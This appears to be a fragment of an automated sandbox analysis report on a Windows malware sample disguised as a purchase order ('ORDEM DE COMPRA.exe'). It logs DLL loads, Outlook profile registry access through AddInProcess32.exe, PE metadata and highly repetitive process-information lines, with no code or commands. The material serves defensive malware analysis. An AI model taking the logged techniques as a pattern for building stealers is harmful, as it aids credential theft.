              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: ORDEM DE COMPRA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: ORDEM DE COMPRA.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: ORDEM DE COMPRA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: System.Windows.Forms.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.ni.pdbRSDS source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: Microsoft.CSharp.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Dynamic.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.pdb0 source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: mscorlib.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Core.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.pdb` source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.ni.pdbRSDS source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.pdbMZ source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Core.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: ORDEM DE COMPRA.exeStatic PE information: 0xD4FC1361 [Fri Mar 26 12:30:25 2083 UTC]
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348ADF45 push BA495F4Dh; iretd 0_2_00007FFD348ADF6A
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD348A00BD pushad ; iretd 0_2_00007FFD348A00C1
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD349C0261 push esp; retf 4810h0_2_00007FFD349C0552
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeCode function: 0_2_00007FFD349C0224 pushad ; ret 0_2_00007FFD349C0225
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_02F69770 push esp; ret 5_2_02F69771
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A68F86 push es; iretd 5_2_06A6903C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A67C3D push es; ret 5_2_06A67C50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A69000 push es; iretd 5_2_06A6903C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7367B push es; iretd 5_2_06A7367C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7F75F push es; ret 5_2_06A7F888
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7F88B push es; ret 5_2_06A7F888
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A79045 push es; ret 5_2_06A7904C

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
